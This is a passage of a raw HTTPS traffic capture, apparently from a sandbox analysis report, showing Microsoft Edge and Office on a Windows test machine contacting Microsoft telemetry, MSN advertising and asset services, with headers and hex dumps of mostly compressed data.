4a c2 a4 35 e7 90 72 36 84 b1 3f 42 0e df 72 66 Data Ascii: !-_locales/sv/messages.jsonUTPf R=o0+FpESYdaN#HrrK}EE_*1=wDHe+uwaun&pf# 7;)::+TEJ5r6?Brf
2024-11-09 01:47:34 UTC	1378	IN	Data Raw: d6 92 10 e8 84 d6 9a 4c 28 b9 28 68 15 81 3d 3a d0 47 7f 87 f5 aa c5 a0 2c 48 96 b4 9f 93 24 bf 74 ca 3b a4 a0 f9 6a e6 a1 cc 40 81 91 19 30 5d a1 39 7e 39 01 48 39 a0 4f 22 d8 2a e1 e0 08 be e7 cf 6d 6c b8 0b be c9 03 07 28 7d 6a dc e2 3f 42 98 78 2d d6 a1 b1 19 12 f8 68 b4 04 85 9d 97 35 1c 1b 0c 16 5f 55 b4 c5 fe ea 43 28 83 0e 40 08 bf 0d 79 16 7a c3 cf 26 b0 46 00 0e 4b 9e 50 f8 ed 3b 0e 8c 5d 3c 0b 64 ca 72 2e 90 41 1f b1 d4 e7 ed 22 33 dd 46 8d 4d 1a 99 c7 e4 99 3c 21 86 b1 e4 d2 54 27 cf df ef 91 4e 01 0d 30 81 96 55 96 37 4e 3d d0 01 5c b2 ca 55 80 04 ec aa e2 2a 73 90 6b ac 51 58 5b 6a 0a 34 8b b4 b7 4f b0 0d b9 c6 2c a1 85 38 3d c9 71 2f 07 ef 6d df 60 8f b9 82 8c 87 80 43 e8 d4 88 fe 62 9f b4 94 b9 d7 66 ac 7c 82 88 1d 51 d1 f9 61 37 fe 39 d8 Data Ascii: L((h=:G,H$t;j@0]9~9H9O"ml(}j?Bx-h5_UC(@yz&FKP;]<dr.A"3FM<!T'N0U7N=\UskQX[j4O,8=q/m`Cbf\|Qa79
2024-11-09 01:47:34 UTC	1378	IN	Data Raw: ad c4 ca 60 aa 12 70 5b 7b 7a c3 30 ec 7c ed 63 70 f3 2d c2 2b 61 1b 8f d7 00 1b e0 cd 2b ef 78 f7 a3 67 c0 39 32 a9 1f 80 6c 66 17 97 d6 80 80 69 32 ab bf c3 f0 d2 d1 02 c6 d1 d1 ca 7f 28 f3 d3 05 cf d7 e6 67 96 67 73 39 3b dd 9e 5f c5 2e 08 52 5b 60 e6 23 e4 24 80 17 de cf 8c 32 61 22 26 18 40 81 51 37 1a 3d e4 69 36 45 18 6c 38 96 b1 f8 bc 04 25 63 8c 69 6f 0b 8e 93 22 11 da 2b e2 2e dd 3c 66 df 7d 3c c4 05 36 71 e2 c9 b8 a6 7e 66 b3 9b 73 21 3a a7 95 67 38 d4 83 89 c3 d7 91 64 de c5 5b 01 f5 ff a5 13 58 78 d8 a8 54 25 22 24 d8 16 40 cd 81 70 5e c5 3b d8 dd 55 72 b8 9e d6 48 15 06 41 57 68 5b e8 27 30 b1 82 0f e8 09 d8 f8 24 0d ae 73 05 91 20 6f 32 84 0d f0 82 95 ca 25 80 50 f5 46 fa 49 1e 46 5e 38 4e d2 28 ef db ce 9f 18 54 a7 c3 53 4b c7 26 a2 ba e4 Data Ascii: `p[{z0\|cp-+a+xg92lfi2(ggs9;_.R[`#$2a"&@Q7=i6El8%cio"+.<f}<6q~fs!:g8d[XxT%"$@p^;UrHAWh['0$s o2%PFIF^8N(TSK&
2024-11-09 01:47:34 UTC	1378	IN	Data Raw: 58 0d 04 41 31 f1 f1 a8 15 a1 54 1e 5a 8d 72 3d e2 47 40 31 01 b6 e2 e3 20 ba 53 87 b9 64 39 96 a9 1f 50 8d c3 df 89 4f 3c 44 83 14 ce e2 33 f3 a3 46 d1 e2 45 58 a7 2c f7 48 0a 04 81 50 14 d0 11 86 4d 66 e7 ff be d5 aa ce 18 47 ec d9 2c f8 22 13 e5 35 27 b7 b0 97 2a bf 2c 0b d7 07 48 d7 30 c9 86 93 1f b0 17 3e b8 b1 bc a7 01 17 51 9c 66 55 50 9a b0 bb 80 25 f5 6f 33 e1 cf d4 9d 1c 93 ba 54 72 a7 e2 f6 75 97 90 fe 6f d2 46 10 67 11 75 4c 7e d0 94 af e3 4d 5d b4 38 17 ad 83 c4 09 26 df 24 fb 10 6d 5d e5 56 f8 11 0d 2d bb f3 2c 35 9d 43 aa d3 dc cc 21 ae 95 db 49 63 90 e8 bb b5 a2 31 68 28 4f c1 46 84 c4 ae 85 65 77 6e 1d 5c 72 28 c5 cb d9 9f 0c 82 36 6a 85 c3 0c cb 86 67 50 98 fd a8 5e 6f c5 03 8b 54 f3 c2 30 f0 94 72 6d 96 45 e2 75 68 b3 3c 02 83 6b 79 2f Data Ascii: XA1TZr=G@1 Sd9PO<D3FEX,HPMfG,"5'*,H0>QfUP%o3TruoFguL~M]8&$m]V-,5C!Ic1h(OFewn\r(6jgP^oT0rmEuh<ky/
2024-11-09 01:47:34 UTC	1378	IN	Data Raw: 14 0d 73 e2 64 7e de 02 18 e4 0f c3 f4 76 5f 5c be dd ce 6f 88 69 ac e4 50 fa ee 07 ab c8 a0 8b 52 e9 bb 55 6b fa 9f c6 22 3c 29 b7 da 31 d5 9e ae 5a b0 94 e9 7c 5c e7 66 a1 94 56 e8 81 c0 57 d2 a5 5b 41 6a 0e 92 60 dd 9b c4 c3 77 12 c5 dc 29 96 c5 76 0c 56 10 bf 85 d3 7f df 78 05 8d e2 78 fc 2e d0 e2 68 c5 5e ba e2 78 a2 f7 ae 74 a2 c9 5d 23 c5 a1 dd 77 87 05 87 09 52 cb 31 68 27 3d 4b 9d 65 b2 de 77 fd b1 ff 96 4d 3f 5e 60 b9 1e 38 a4 9e c8 b0 ea d5 db 24 51 55 05 52 b6 f2 27 f0 e4 fd 6c 75 91 a7 7f 43 1e 77 ee c0 54 0b 56 cd 31 4f 5e ee ea 9b de 9a b3 38 11 b7 da d9 f9 e5 0f 50 4b 07 08 fd 45 55 f9 17 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6d 6e 2f 6d 65 Data Ascii: sd~v_\oiPRUk"<)1Z\|\fVW[Aj`w)vVxx.h^xt]#wR1h'=KewM?^`8$QUR'luCwTV1O^8PKEUPK!-_locales/mn/me

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.7	53019	13.89.178.27	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731116851923&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3809 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=1A1E8714CE116135161B9226CFE060A6; _EDGE_S=F=1&SID=14F9B7E8AA396BDD1722A2DAAB0C6AEE; _EDGE_V=1
2024-11-09 01:47:33 UTC	3809	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 30 39 54 30 31 3a 34 37 3a 33 31 2e 39 31 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 32 65 34 63 36 30 32 2d 39 38 30 32 2d 34 30 32 38 2d 62 65 39 34 2d 65 66 65 63 65 62 66 66 39 39 38 63 22 2c 22 65 70 6f 63 68 22 3a 22 37 37 36 34 31 36 31 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22 Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-11-09T01:47:31.913Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"52e4c602-9802-4028-be94-efecebff998c","epoch":"776416166"},"app":{"locale"
2024-11-09 01:47:34 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=89a48c8c4936423bab75177317e5994b&HASH=89a4&LV=202411&V=4&LU=1731116853976; Domain=.microsoft.com; Expires=Sun, 09 Nov 2025 01:47:33 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=d1f4c5fa13fc4167bc729c475b03590c; Domain=.microsoft.com; Expires=Sat, 09 Nov 2024 02:17:33 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2053 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Sat, 09 Nov 2024 01:47:33 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.7	53015	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:34 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:33 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: a14a0ed7-201e-0096-78aa-31ace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014733Z-16547b76f7f9rdn9hC1DFWfk7s0000000acg00000000hfh0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:34 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.7	53022	20.125.209.212	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	1175	OUT	GET /c.gif?rnd=1731116851926&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a598ac3b3e2d48a2b71daf2c0b512480&activityId=a598ac3b3e2d48a2b71daf2c0b512480&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=1A1E8714CE116135161B9226CFE060A6; _EDGE_S=F=1&SID=14F9B7E8AA396BDD1722A2DAAB0C6AEE; _EDGE_V=1
2024-11-09 01:47:34 UTC	1108	IN	HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Location: https://c.bing.com/c.gif?rnd=1731116851926&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a598ac3b3e2d48a2b71daf2c0b512480&activityId=a598ac3b3e2d48a2b71daf2c0b512480&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=3A66BFEA2F024D7D9C9C07749E98C1C6&RedC=c.msn.com&MXFR=1A1E8714CE116135161B9226CFE060A6 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=1A1E8714CE116135161B9226CFE060A6; domain=.msn.com; expires=Thu, 04-Dec-2025 01:47:34 GMT; path=/; SameSite=None; Secure; Priority=High; Date: Sat, 09 Nov 2024 01:47:33 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.7	53025	13.107.246.57	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:34 UTC	576	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Thu, 07 Nov 2024 20:03:34 GMT ETag: 0x8DCFF6742E8F24C x-ms-request-id: 7e2e03fb-701e-0041-06c5-314014000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241109T014734Z-17df447cdb5l865xhC1DFW9n7g00000003kg00000000mxdp Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:34 UTC	15808	IN	Data Raw: 1f 8b 08 08 16 1d 2d 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: -gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-11-09 01:47:34 UTC	16384	IN	Data Raw: c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 Data Ascii: qb,0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:
2024-11-09 01:47:34 UTC	16384	IN	Data Raw: c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b Data Ascii: Rg\|M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|crkX
2024-11-09 01:47:34 UTC	16384	IN	Data Raw: 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc Data Ascii: AHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;
2024-11-09 01:47:34 UTC	5247	IN	Data Raw: 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e Data Ascii: *'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.7	53024	20.99.185.48	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	1068	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=1A1E8714CE116135161B9226CFE060A6&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-2063246587742936609&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=48fbe1119c6440f9dd284a672113c0f0 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=1A1E8714CE116135161B9226CFE060A6; _EDGE_S=F=1&SID=14F9B7E8AA396BDD1722A2DAAB0C6AEE; _EDGE_V=1
2024-11-09 01:47:34 UTC	674	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 297 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"2,,"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 09 Nov 2024 01:47:33 GMT Connection: close
2024-11-09 01:47:34 UTC	297	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 38 38 30 30 30 33 30 38 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 7d 2c 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 31 30 38 33 37 33 39 33 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"placement":"88000308","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}]},{"placement":"10837393","errors":[{"code":2040,"msg":"Demand source returns error (Name: G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.7	53029	23.38.189.81	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
